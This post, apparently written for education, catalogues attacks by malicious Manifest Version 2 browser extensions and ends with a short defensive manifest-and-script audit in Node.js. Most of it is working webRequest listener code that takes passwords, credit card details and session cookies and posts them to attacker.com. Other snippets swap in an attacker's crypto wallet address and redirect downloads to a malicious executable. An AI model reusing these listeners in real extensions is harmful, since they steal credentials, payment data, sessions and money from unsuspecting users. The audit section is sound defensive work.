Hello, here are some examples with sample code snippets on how Manifest Version 2 extensions can be used in exploitation (please do not use any of these examples in your code; MV2 is already deprecated and these examples are for educational purposes only).
- Password Theft: A malicious extension can use the webRequest API to intercept login requests and steal passwords.
```javascript
chrome.webRequest.onBeforeRequest.addListener(
  function(details) {
    if (details.url.includes("login") && details.method === "POST") {
      const body = details.requestBody;
      // Extract username and password from the request body
      const username = body.formData.username[0];
      const password = body.formData.password[0];
      // Send the credentials to the attacker's server
      fetch("https://attacker.com/steal-credentials", {
        method: "POST",
        body: JSON.stringify({ username, password }),
        headers: {
          "Content-Type": "application/json"
        }
      });
    }
  },
  { urls: ["<all_urls>"] },
  ["blocking", "requestBody"]
);
```
- Credit Card Theft: A malicious extension can use the webRequest API to intercept payment requests and steal credit card numbers.
```javascript
chrome.webRequest.onBeforeRequest.addListener(
  function(details) {
    if (details.url.includes("checkout") && details.method === "POST") {
      const body = details.requestBody;
      // Extract credit card information from the request body
      const cardNumber = body.formData.cardNumber[0];
      const expirationDate = body.formData.expirationDate[0];
      const cvv = body.formData.cvv[0];
      // Send the credit card information to the attacker's server
      fetch("https://attacker.com/steal-credit-cards", {
        method: "POST",
        body: JSON.stringify({ cardNumber, expirationDate, cvv }),
        headers: {
          "Content-Type": "application/json"
        }
      });
    }
  },
  { urls: ["<all_urls>"] },
  ["blocking", "requestBody"]
);
```
- Session Hijacking: A malicious extension can use the webRequest API to intercept session cookies and hijack user sessions.
```javascript
chrome.webRequest.onBeforeSendHeaders.addListener(
  function(details) {
    const cookies = details.requestHeaders.filter(header => header.name === "Cookie");
    if (cookies.length > 0) {
      // Send the cookies to the attacker's server
      fetch("https://attacker.com/hijack-sessions", {
        method: "POST",
        body: JSON.stringify({ cookies: cookies[0].value }),
        headers: {
          "Content-Type": "application/json"
        }
      });
    }
  },
  { urls: ["<all_urls>"] },
  ["blocking", "requestHeaders"]
);
```
- Phishing Attacks: A malicious extension can use the webRequest API to redirect users to phishing sites that look like legitimate websites.
- Ad Injection: A malicious extension can use the webRequest API to inject ads into web pages, which can be used to generate revenue for the attacker.
- Data Manipulation: A malicious extension can use the webRequest API to modify the content of web pages, which can be used to spread misinformation or propaganda.
- Clickjacking: A malicious extension can use the webRequest API to overlay transparent iframes over legitimate web pages, tricking users into clicking on ads or malicious links.
- Cryptojacking: A malicious extension can use the webRequest API to inject cryptocurrency mining scripts into web pages, which can use up the user's CPU and battery resources without their consent.
- Browser Fingerprinting: A malicious extension can use the webRequest API to collect information about the user's browser and device, which can be used for tracking and profiling.
- Web Scraping: A malicious extension can use the webRequest API to scrape content from web pages, which can be used for competitive intelligence or content theft.
- Malware Distribution: A malicious extension can use the webRequest API to inject malware into web pages, which can infect users' devices when they visit the page.
- Ad Fraud: A malicious extension can use the webRequest API to manipulate ad impressions and clicks, which can generate fraudulent revenue for the attacker.
- SEO Manipulation: A malicious extension can use the webRequest API to modify the content of web pages, which can be used to manipulate search engine rankings.
- Data Exfiltration: A malicious extension can use the webRequest API to exfiltrate data from web pages, which can be used for espionage or data theft.
- Cryptocurrency Theft: A malicious extension can use the webRequest API to intercept cryptocurrency transactions and steal funds.
```javascript
chrome.webRequest.onBeforeRequest.addListener(
  function(details) {
    if (details.url.includes("crypto-transfer") && details.method === "POST") {
      const body = details.requestBody;
      // Change the recipient address to the attacker's address
      body.formData.recipientAddress[0] = "attacker_wallet_address";
      // Allow the modified request to proceed
      return { requestBody: body };
    }
  },
  { urls: ["<all_urls>"] },
  ["blocking", "requestBody"]
);
```
- Social Engineering: A malicious extension can use the webRequest API to modify web pages in a way that tricks users into divulging sensitive information.
- Drive-by Downloads: A malicious extension can use the webRequest API to inject drive-by download scripts into web pages, which can automatically download and install malware on users' devices.
```javascript
chrome.webRequest.onCompleted.addListener(
  function(details) {
    if (details.url.includes("download") && details.method === "GET") {
      // Redirect the user to a malicious download link
      // Attacker can make an endpoint that serves a malicious file with the same name and a similar size to avoid suspicion
      chrome.tabs.update(details.tabId, { url: "https://attacker.com/malicious-file.exe" });
    }
  },
  { urls: ["<all_urls>"] },
  ["blocking"]
);
```
- Ad and Content Blocking Evasion: A malicious extension can use the webRequest API to bypass ad-blockers and content filters, allowing ads and unwanted content to be displayed to users.
- Analytics Manipulation: A malicious extension can use the webRequest API to manipulate web analytics data, which can be used to mislead website owners about their traffic and user behavior.
- Click Fraud: A malicious extension can use the webRequest API to generate fake clicks on ads, which can generate fraudulent revenue for the attacker.
- Cryptocurrency Mining: A malicious extension can use the webRequest API to inject cryptocurrency mining scripts into web pages, which can use up the user's CPU and battery resources without their consent.
- Modifying Requests and Responses: The webRequest API allows extensions to modify request headers and responses, which can be used to inject malicious code into web pages or redirect users to phishing sites.
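Every snippet above depends on the same three ingredients: an MV2 manifest, the `webRequest` plus `webRequestBlocking` permissions, and a `<all_urls>` host match. As an added example that is not part of the original post, here is a small Node.js audit that flags that combination in a manifest and spots the "blocking listener that reads request data and also calls out" shape in a background script; the sample manifests, the script text and the `example.invalid` host are constructed.

```javascript
// Added defensive example (not from the original post): static checks for the
// MV2 webRequest interception pattern. Node.js, no dependencies.

// Host patterns that make a listener apply to every site the user visits.
const BROAD_HOSTS = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// Score a parsed manifest.json object; returns a level plus readable findings.
function auditManifest(manifest) {
  const perms = manifest.permissions || [];
  const findings = [];
  const isMv2 = manifest.manifest_version === 2;
  const canBlock = perms.includes("webRequest") && perms.includes("webRequestBlocking");
  const broad = perms.some((p) => BROAD_HOSTS.has(p));

  if (isMv2) findings.push("manifest_version 2: deprecated, blocking webRequest still available");
  if (canBlock) findings.push("webRequest + webRequestBlocking: can read and alter requests in flight");
  if (broad) findings.push("broad host permission: listener applies to every site the user visits");

  const level = canBlock && broad ? "high" : canBlock || broad ? "medium" : "low";
  return { level, findings };
}

// Flag background-script source that registers a blocking webRequest listener,
// asks for request bodies or headers, and also makes its own outbound call.
function scanBackgroundSource(src) {
  const registersBlocking =
    /chrome\.webRequest\.on\w+\.addListener/.test(src) && /["']blocking["']/.test(src);
  const readsRequestData = /["']requestBody["']/.test(src) || /["']requestHeaders["']/.test(src);
  const outboundCall = /\bfetch\s*\(\s*["']https?:\/\//.test(src) || /XMLHttpRequest/.test(src);
  return { registersBlocking, readsRequestData, outboundCall,
           suspicious: registersBlocking && readsRequestData && outboundCall };
}

// Constructed samples: one manifest shaped like the snippets above, one benign.
const riskyManifest = {
  manifest_version: 2,
  permissions: ["webRequest", "webRequestBlocking", "<all_urls>"],
  background: { scripts: ["background.js"] },
};
const benignManifest = { manifest_version: 3, permissions: ["storage"] };

// Constructed background script text with the interception-plus-callout shape.
const sampleBackgroundJs = `
chrome.webRequest.onBeforeRequest.addListener(function (d) {
  fetch("https://example.invalid/collect", { method: "POST", body: JSON.stringify(d.requestBody) });
}, { urls: ["<all_urls>"] }, ["blocking", "requestBody"]);`;

console.log(auditManifest(riskyManifest), auditManifest(benignManifest));
console.log(scanBackgroundSource(sampleBackgroundJs));
```

Run it against the unpacked extension's `manifest.json` and background scripts before sideloading; a "high" level with a suspicious script is the exact shape shown in the snippets above.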